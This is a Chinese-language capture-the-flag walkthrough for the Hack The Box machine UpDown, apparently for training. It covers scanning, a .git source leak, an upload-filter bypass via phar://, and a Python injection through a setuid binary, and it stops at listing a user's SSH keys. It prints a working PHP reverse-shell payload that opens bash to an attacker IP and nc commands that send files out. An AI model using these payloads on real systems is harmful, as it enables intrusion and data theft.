UpDown-htb-writeup

0x00 靶场技能介绍

章节技能：目录扫描、二级目录扫描、虚拟主机子域名扫描、.git源码泄露、git_dumper.py、.htaccess 配置文件、文件上传绕过、上传扩展名为 png 的 zip 文件、phar://path、二进制文件字符串分析、Python内置命令执行代码、ssh秘钥获取并登录、sudo提权、easy_install提权

参考链接：https://htbwp.readthedocs.io/en/latest/linux/UpDown.html

参考链接：https://0xdf.gitlab.io/2023/01/21/htb-updown.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.11.177

2、获取下开放端口情况：

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=2000 10.10.11.177 -oG allports -Pn 
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 07:22 CST
Nmap scan report for 10.10.11.177
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 40.22 seconds
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 -sC -sV --min-rate=2000 10.10.11.177 -Pn              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 07:24 CST
Nmap scan report for 10.10.11.177
Host is up (0.10s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
|   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.36 seconds

3、绑定下域名地址，再查看下默认的80端口信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.177 siteisup.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.177 siteisup.htb

http://10.10.11.177/

4、扫描下目录情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://10.10.11.177/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.177/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

#                       [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 105ms]
# Copyright 2007 James Fisher [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 105ms]
#                       [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 106ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 107ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 111ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 113ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 3450ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 3451ms]
# on at least 2 different hosts [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 6904ms]
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 6910ms]
#                       [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 6907ms]
                        [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 9721ms]
#                       [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 114ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 115ms]
dev                     [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 106ms]
                        [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 107ms]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 107ms]
:: Progress: [220560/220560] :: Job [1/1] :: 232 req/sec :: Duration: [0:15:32] :: Errors: 132 ::

5、发现了2个文件，一个是dev目录一个是server-status，分别查看下

http://siteisup.htb/server-status

HTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 15:51:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for siteisup.htb (via 127.0.2.1)</h1>

<dl><dt>Server Version: Apache/2.4.41 (Ubuntu)</dt>
<dt>Server MPM: prefork</dt>
<dt>Server Built: 2022-06-14T13:30:55
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 27-Apr-2024 15:51:39 UTC</dt>
<dt>Restart Time: Saturday, 27-Apr-2024 15:15:58 UTC</dt>
<dt>Parent Server Config. Generation: 1</dt>
<dt>Parent Server MPM Generation: 0</dt>
<dt>Server uptime:  35 minutes 40 seconds</dt>
<dt>Server load: 0.75 1.07 0.54</dt>
<dt>Total accesses: 254074 - Total Traffic: 135.3 MB - Total Duration: 628543</dt>
<dt>CPU Usage: u3.92 s3.76 cu11.11 cs9.73 - 1.33% CPU load</dt>
<dt>119 requests/sec - 64.7 kB/second - 558 B/request - 2.47386 ms/request</dt>
<dt>54 requests currently being processed, 6 idle workers</dt>
</dl><pre>KK.KKK_KKKKKKKWKKKKKKKKKKKKKKKKKKKKKKK_KKKKKK.KKKK__KKK..K..._.W
K....K._.K......................................................
......................</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection, 
"<b><code>S</code></b>" Starting up, 
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply, 
"<b><code>K</code></b>" Keepalive (read), 
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection, 
"<b><code>L</code></b>" Logging, 
"<b><code>G</code></b>" Gracefully finishing,<br /> 
"<b><code>I</code></b>" Idle cleanup of worker, 
"<b><code>.</code></b>" Open slot with no current process<br />
</p>


<table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU
</th><th>SS</th><th>Req</th><th>Dur</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>Protocol</th><th>VHost</th><th>Request</th></tr>

<tr><td><b>3-0</b></td><td>1375</td><td>32/1018/7730</td><td><b>K</b>
</td><td>0.10</td><td>0</td><td>0</td><td>14338</td><td>17.1</td><td>0.53</td><td>4.16
</td><td>10.10.14.39</td><td>http/1.1</td><td nowrap>localhost:80</td><td nowrap>GET /20070113 HTTP/1.1</td></tr>

<tr><td><b>4-0</b></td><td>1356</td><td>30/1280/4673</td><td><b>K</b>
</td><td>0.12</td><td>0</td><td>0</td><td>10005</td><td>16.1</td><td>0.67</td><td>2.47
</td><td>10.10.14.39</td><td>http/1.1</td><td nowrap>localhost:80</td><td nowrap>GET /goldmedalPlea HTTP/1.1</td></tr>

<tr><td><b>80-0</b></td><td>-</td><td>0/0/1</td><td>.
</td><td>0.00</td><td>487</td><td>0</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00
</td><td>::1</td><td>http/1.1</td><td nowrap>localhost:80</td><td nowrap>OPTIONS * HTTP/1.0</td></tr>

</table>
 <hr /> <table>
 <tr><th>Srv</th><td>Child Server number - generation</td></tr>
 <tr><th>PID</th><td>OS process ID</td></tr>
 <tr><th>Acc</th><td>Number of accesses this connection / this child / this slot</td></tr>
 <tr><th>M</th><td>Mode of operation</td></tr>
<tr><th>CPU</th><td>CPU usage, number of seconds</td></tr>
<tr><th>SS</th><td>Seconds since beginning of most recent request</td></tr>
 <tr><th>Req</th><td>Milliseconds required to process most recent request</td></tr>
 <tr><th>Dur</th><td>Sum of milliseconds required to process all requests</td></tr>
 <tr><th>Conn</th><td>Kilobytes transferred this connection</td></tr>
 <tr><th>Child</th><td>Megabytes transferred this child</td></tr>
 <tr><th>Slot</th><td>Total megabytes transferred this slot</td></tr>
 </table>
<hr />
<address>Apache/2.4.41 (Ubuntu) Server at siteisup.htb Port 80</address>
</body></html>

┌──(kali㉿offsec)-[~/Desktop]
└─$ dirsearch -u http://10.10.11.177/dev/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_10.10.11.177/_dev__24-04-28_08-13-20.txt

Target: http://10.10.11.177/

[08:13:20] Starting: dev/
[08:13:25] 301 -  315B  - /dev/.git  ->  http://10.10.11.177/dev/.git/      
[08:13:25] 200 -  413B  - /dev/.git/branches/                               
[08:13:25] 200 -  602B  - /dev/.git/
[08:13:25] 200 -   73B  - /dev/.git/description                             
[08:13:25] 200 -  298B  - /dev/.git/config
[08:13:25] 200 -   21B  - /dev/.git/HEAD                                    
[08:13:25] 200 -  675B  - /dev/.git/hooks/                                  
[08:13:25] 200 -  521B  - /dev/.git/index                                   
[08:13:25] 200 -  459B  - /dev/.git/info/                                   
[08:13:25] 200 -  240B  - /dev/.git/info/exclude                            
[08:13:25] 200 -  483B  - /dev/.git/logs/
[08:13:25] 301 -  325B  - /dev/.git/logs/refs  ->  http://10.10.11.177/dev/.git/logs/refs/
[08:13:25] 200 -  179B  - /dev/.git/logs/HEAD
[08:13:25] 301 -  331B  - /dev/.git/logs/refs/heads  ->  http://10.10.11.177/dev/.git/logs/refs/heads/
[08:13:25] 301 -  333B  - /dev/.git/logs/refs/remotes  ->  http://10.10.11.177/dev/.git/logs/refs/remotes/
[08:13:25] 301 -  340B  - /dev/.git/logs/refs/remotes/origin  ->  http://10.10.11.177/dev/.git/logs/refs/remotes/origin/
[08:13:25] 200 -  179B  - /dev/.git/logs/refs/remotes/origin/HEAD           
[08:13:25] 200 -  466B  - /dev/.git/objects/                                
[08:13:25] 200 -  112B  - /dev/.git/packed-refs
[08:13:25] 301 -  326B  - /dev/.git/refs/heads  ->  http://10.10.11.177/dev/.git/refs/heads/
[08:13:25] 200 -  473B  - /dev/.git/refs/
[08:13:25] 301 -  328B  - /dev/.git/refs/remotes  ->  http://10.10.11.177/dev/.git/refs/remotes/
[08:13:25] 301 -  335B  - /dev/.git/refs/remotes/origin  ->  http://10.10.11.177/dev/.git/refs/remotes/origin/
[08:13:25] 200 -   30B  - /dev/.git/refs/remotes/origin/HEAD
[08:13:25] 301 -  325B  - /dev/.git/refs/tags  ->  http://10.10.11.177/dev/.git/refs/tags/
[08:13:25] 403 -  277B  - /dev/.ht_wsr.txt                                  
[08:13:25] 403 -  277B  - /dev/.htaccess.bak1                               
[08:13:25] 403 -  277B  - /dev/.htaccess.save                               
[08:13:25] 403 -  277B  - /dev/.htaccess.sample
[08:13:25] 403 -  277B  - /dev/.htaccess.orig
[08:13:25] 403 -  277B  - /dev/.htaccess_extra                              
[08:13:25] 403 -  277B  - /dev/.htaccess_orig
[08:13:25] 403 -  277B  - /dev/.htaccess_sc
[08:13:25] 403 -  277B  - /dev/.htaccessBAK
[08:13:25] 403 -  277B  - /dev/.htaccessOLD
[08:13:25] 403 -  277B  - /dev/.htaccessOLD2
[08:13:25] 403 -  277B  - /dev/.html                                        
[08:13:25] 403 -  277B  - /dev/.htm                                         
[08:13:25] 403 -  277B  - /dev/.htpasswds                                   
[08:13:25] 403 -  277B  - /dev/.httr-oauth
[08:13:26] 403 -  277B  - /dev/.htpasswd_test                               
[08:13:27] 403 -  277B  - /dev/.php                                         
                                                                             
Task Completed 

http://10.10.11.177/dev/

http://10.10.11.177/dev/.git/

6、再此之前，再枚举下子域名信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://siteisup.htb -H 'Host: FUZZ.siteisup.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fs 1131

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://siteisup.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.siteisup.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 1131
________________________________________________

dev                     [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 4558ms]
:: Progress: [19966/19966] :: Job [1/1] :: 188 req/sec :: Duration: [0:01:31] :: Errors: 0 ::

echo "10.10.11.177 dev.siteisup.htb" | sudo tee -a /etc/hosts

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.177 dev.siteisup.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码：
10.10.11.177 dev.siteisup.htb

http://dev.siteisup.htb/

7、前期使用了gitdumper.sh 工具进行下载，结果该工具下载的文件不全，导致我一直卡着了，这里整个目录都翻遍了，也没发现自己想发现的内容，故查看writeup，发现是 .git 这里下载的文件不全，故换了个工具重新开始下载

┌──(kali㉿offsec)-[~/Desktop/git-dumper-py]
└─$ python3 git_dumper.py http://10.10.11.177/dev/.git ./temp 
[-] Testing http://10.10.11.177/dev/.git/HEAD [200]
[-] Testing http://10.10.11.177/dev/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.11.177/dev/.git/ [200]
[-] Fetching http://10.10.11.177/dev/.gitignore [404]
[-] http://10.10.11.177/dev/.gitignore responded with status code 404
[-] Fetching http://10.10.11.177/dev/.git/packed-refs [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/ [200]
[-] Fetching http://10.10.11.177/dev/.git/branches/ [200]
[-] Fetching http://10.10.11.177/dev/.git/config [200]
[-] Fetching http://10.10.11.177/dev/.git/HEAD [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/ [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/post-update.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/commit-msg.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-commit.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-receive.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-push.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/ [200]
[-] Fetching http://10.10.11.177/dev/.git/info/ [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/heads/ [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/update.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/remotes/ [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/tags/ [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/HEAD [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/ [200]
[-] Fetching http://10.10.11.177/dev/.git/info/exclude [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/heads/main [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/remotes/origin/ [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/heads/ [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/remotes/ [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/remotes/origin/HEAD [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/remotes/origin/ [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/heads/main [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/remotes/origin/HEAD [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/ [200]
[-] Fetching http://10.10.11.177/dev/.git/description [200]
[-] Fetching http://10.10.11.177/dev/.git/index [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/info/ [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/pack/ [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/pack/pack-30e4e40cb7b0c696d1ce3a83a6725267d45715da.pack [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/pack/pack-30e4e40cb7b0c696d1ce3a83a6725267d45715da.idx [200]
[-] Sanitizing .git/config
[-] Running git checkout .
从索引区更新了 6 个路径

8、查看分析文件

┌──(kali㉿offsec)-[~/Desktop/git-dumper-py/temp]
└─$ ls -la                 
总计 40
drwxr-xr-x 3 kali kali 4096  4月28日 22:26 .
drwxrwxr-x 3 kali kali 4096  4月28日 22:26 ..
-rw-r--r-- 1 kali kali   59  4月28日 22:26 admin.php
-rw-r--r-- 1 kali kali  147  4月28日 22:26 changelog.txt
-rw-r--r-- 1 kali kali 3145  4月28日 22:26 checker.php
drwxr-xr-x 7 kali kali 4096  4月28日 22:26 .git
-rw-r--r-- 1 kali kali  117  4月28日 22:26 .htaccess
-rw-r--r-- 1 kali kali  273  4月28日 22:26 index.php
-rw-r--r-- 1 kali kali 5531  4月28日 22:26 stylesheet.css

┌──(kali㉿offsec)-[~/Desktop/git-dumper-py/temp]
└─$ cat .htaccess              
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header

SetEnvIfNoCase特殊开发“only4dev”必需标题
订单拒绝、允许
全部拒绝
Allow from env=必需标头

Special-Dev "only4dev"

9、这里显示，添加上这个文件头，就可以访问地址，结合上面发现的Dev子域名，可以尝试下

http://dev.siteisup.htb/

10、发现了可以上传文件的页面，结合 .git 源码里发现的情况，可以上传扩展名为 png 的 zip 文件，进行绕过

if($_POST['check']){
  
        # File size must be less than 10kb.
        if ($_FILES['file']['size'] > 10000) {
        die("File too large!");
    }
        $file = $_FILES['file']['name'];
        
        # Check if extension is allowed.
        $ext = getExtension($file);
        if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
                die("Extension not allowed!");
        }
  
        # Create directory to upload our file.
        $dir = "uploads/".md5(time())."/";
        if(!is_dir($dir)){
        mkdir($dir, 0770, true);
    }


<b>This is only for developers</b>
<br>
<a href="?page=admin">Admin Panel</a>
<?php
        define("DIRECTACCESS",false);
        $page=$_GET['page'];
        if($page && !preg_match("/bin|usr|home|var|etc/i",$page)){
                include($_GET['page'] . ".php");
        }else{
                include("checker.php");
        }       
?>

11、构造压缩包文件，并开始上传

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat pipinfo.php 
<?php phpinfo();?>
10.10.14.39
                                                                                           
┌──(kali㉿offsec)-[~/Desktop]
└─$ zip pipinfo.png pipinfo.php
  adding: pipinfo.php (deflated 6%)

http://dev.siteisup.htb/uploads/9df78c6c215ea04b53719ab74e46d47a/pipinfo.png

12、在上传的 zip 中执行 phpinfo，phar://path

http://dev.siteisup.htb/?page=phar://uploads/9df78c6c215ea04b53719ab74e46d47a/pipinfo.png/pipinfo

13、接下来就是构造反弹shell进行上传了

<?php
$proc=proc_open("bash -c 'bash -i >&/dev/tcp/10.10.14.39/443 0>&1'",
  array(
    array("pipe","r"),
    array("pipe","w"),
    array("pipe","w")
  ),
  $pipes);
print stream_get_contents($pipes[1]);
?>

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat shell.php              
<?php
$proc=proc_open("bash -c 'bash -i >&/dev/tcp/10.10.14.39/443 0>&1'",
  array(
    array("pipe","r"),
    array("pipe","w"),
    array("pipe","w")
  ),
  $pipes);
print stream_get_contents($pipes[1]);
?>
                             
┌──(kali㉿offsec)-[~/Desktop]
└─$ zip shell.png shell.php    
  adding: shell.php (deflated 33%)

http://dev.siteisup.htb/uploads/7c6eba507d508a9a10bf42e63a81cef8/shell.png

http://dev.siteisup.htb/?page=phar://uploads/7c6eba507d508a9a10bf42e63a81cef8/shell.png/shell

14、成功获取到初始的shell了

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.11.177] 52472
bash: cannot set terminal process group (909): Inappropriate ioctl for device
bash: no job control in this shell
www-data@updown:/var/www/dev$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@updown:/var/www/dev$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root      root      4096 Jun 22  2022 .
drwxr-xr-x 19 root      root      4096 Aug  3  2022 ..
drwxr-xr-x  6 developer developer 4096 Aug 30  2022 developer
www-data@updown:/var/www/dev$ ls -la /home/developer
ls -la /home/developer
total 40
drwxr-xr-x 6 developer developer 4096 Aug 30  2022 .
drwxr-xr-x 3 root      root      4096 Jun 22  2022 ..
lrwxrwxrwx 1 root      root         9 Jul 27  2022 .bash_history -> /dev/null
-rw-r--r-- 1 developer developer  231 Jun 22  2022 .bash_logout
-rw-r--r-- 1 developer developer 3771 Feb 25  2020 .bashrc
drwx------ 2 developer developer 4096 Aug 30  2022 .cache
drwxrwxr-x 3 developer developer 4096 Aug  1  2022 .local
-rw-r--r-- 1 developer developer  807 Feb 25  2020 .profile
drwx------ 2 developer developer 4096 Aug  2  2022 .ssh
drwxr-x--- 2 developer www-data  4096 Jun 22  2022 dev
-rw-r----- 1 root      developer   33 Apr 28 06:05 user.txt
www-data@updown:/var/www/dev$ cat /home/developer/user.txt
cat /home/developer/user.txt
cat: /home/developer/user.txt: Permission denied
www-data@updown:/var/www/dev$ 

15、经过分析发现了目标用户下有个文件，可执行文件，通过nc进行下载

www-data@updown:/var/www/html/dev$ cd /home/developer/dev
cd /home/developer/dev
www-data@updown:/home/developer/dev$ ls -la
ls -la
total 32
drwxr-x--- 2 developer www-data   4096 Jun 22  2022 .
drwxr-xr-x 6 developer developer  4096 Aug 30  2022 ..
-rwsr-x--- 1 developer www-data  16928 Jun 22  2022 siteisup
-rwxr-x--- 1 developer www-data    154 Jun 22  2022 siteisup_test.py
www-data@updown:/home/developer/dev$ 

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 > siteisup
listening on [any] 80 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.11.177] 36696
^C

www-data@updown:/home/developer/dev$ nc -v 10.10.14.39 80 < ./siteisup
nc -v 10.10.14.39 80 < ./siteisup
Connection to 10.10.14.39 80 port [tcp/http] succeeded!

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80 > siteisup_test.py
listening on [any] 80 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.11.177] 36698
^C
www-data@updown:/home/developer/dev$ nc -v 10.10.14.39 80 < ./siteisup_test.py
<oper/dev$ nc -v 10.10.14.39 80 < ./siteisup_test.py
Connection to 10.10.14.39 80 port [tcp/http] succeeded!
www-data@updown:/home/developer/dev$ 

16、开始分析下载的文件

┌──(kali㉿offsec)-[~/Desktop]
└─$ file siteisup_test.py 
siteisup_test.py: ASCII text
                                                                                            
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat siteisup_test.py
import requests

url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
        print "Website is up"
else:
        print "Website is down"

┌──(kali㉿offsec)-[~/Desktop]
└─$ file siteisup        
siteisup: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b5bbc1de286529f5291b48db8202eefbafc92c1f, for GNU/Linux 3.2.0, not stripped

┌──(kali㉿offsec)-[~/Desktop]
└─$ strings siteisup                    
/lib64/ld-linux-x86-64.so.2
libc.so.6
puts
setresgid
setresuid
system
getegid
geteuid
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
Welcome to 'siteisup.htb' application
/usr/bin/python /home/developer/dev/siteisup_test.py
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.8061
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
siteisup.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
setresuid@@GLIBC_2.2.5
_edata
setresgid@@GLIBC_2.2.5
system@@GLIBC_2.2.5
geteuid@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
getegid@@GLIBC_2.2.5
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

17、这里发现，疑似这个程序会运行这个Python脚本

__import__('os').system('id')

__import__('os').system('bash')

18、在shell环境中运行一下看看

www-data@updown:/home/developer/dev$ ./siteisup
./siteisup
__import__('os').system('id')
uid=1002(developer) gid=33(www-data) groups=33(www-data)
Enter URL here:Traceback (most recent call last):
  File "/home/developer/dev/siteisup_test.py", line 4, in <module>
    page = requests.get(url)
  File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 75, in get
    return request('get', url, params=params, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 61, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 515, in request
    prep = self.prepare_request(req)
  File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 453, in prepare_request
    hooks=merge_hooks(request.hooks, self.hooks),
  File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 318, in prepare
    self.prepare_url(url, params)
  File "/usr/local/lib/python2.7/dist-packages/requests/models.py", line 392, in prepare_url
    raise MissingSchema(error)
requests.exceptions.MissingSchema: Invalid URL '0': No scheme supplied. Perhaps you meant http://0?
Welcome to 'siteisup.htb' application

www-data@updown:/home/developer/dev$ 

19、看来可以利用

www-data@updown:/home/developer/dev$ ./siteisup
./siteisup
__import__('os').system('bash')

id
uid=1002(developer) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
developer@updown:/home/developer/dev$ id
id
uid=1002(developer) gid=33(www-data) groups=33(www-data)
developer@updown:/home/developer/dev$ 

20、到这里就获取到了另一个用户的shell了，为了提高shell的可枚举性，我们把ssh的秘钥给弄了下来，并成功登录上了用户

developer@updown:/home/developer/dev$ cd ../
cd ../
developer@updown:/home/developer$ ls -la
ls -la
total 40
drwxr-xr-x 6 developer developer 4096 Aug 30  2022 .
drwxr-xr-x 3 root      root      4096 Jun 22  2022 ..
lrwxrwxrwx 1 root      root         9 Jul 27  2022 .bash_history -> /dev/null
-rw-r--r-- 1 developer developer  231 Jun 22  2022 .bash_logout
-rw-r--r-- 1 developer developer 3771 Feb 25  2020 .bashrc
drwx------ 2 developer developer 4096 Aug 30  2022 .cache
drwxrwxr-x 3 developer developer 4096 Aug  1  2022 .local
-rw-r--r-- 1 developer developer  807 Feb 25  2020 .profile
drwx------ 2 developer developer 4096 Aug  2  2022 .ssh
drwxr-x--- 2 developer www-data  4096 Jun 22  2022 dev
-rw-r----- 1 root      developer   33 Apr 28 06:05 user.txt
developer@updown:/home/developer$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
developer@updown:/home/developer$ cd .ssh
cd .ssh
developer@updown:/home/developer/.ssh$ ls -la
ls -la
total 20
drwx------ 2 developer developer 4096 Aug  2  2022 .
drwxr-xr-x 6 developer developer 4096 Aug 30  2022 ..
-rw-rw-r-- 1 developer developer  572 Aug  2  2022 authorized_keys
-rw------- 1 developer developer 2602 Aug  2  2022 id_rsa
-rw-r--r-- 1 developer developer  572 Aug  2  2022 id_rsa.pub
developer@updown:/home/developer/.ssh$ 

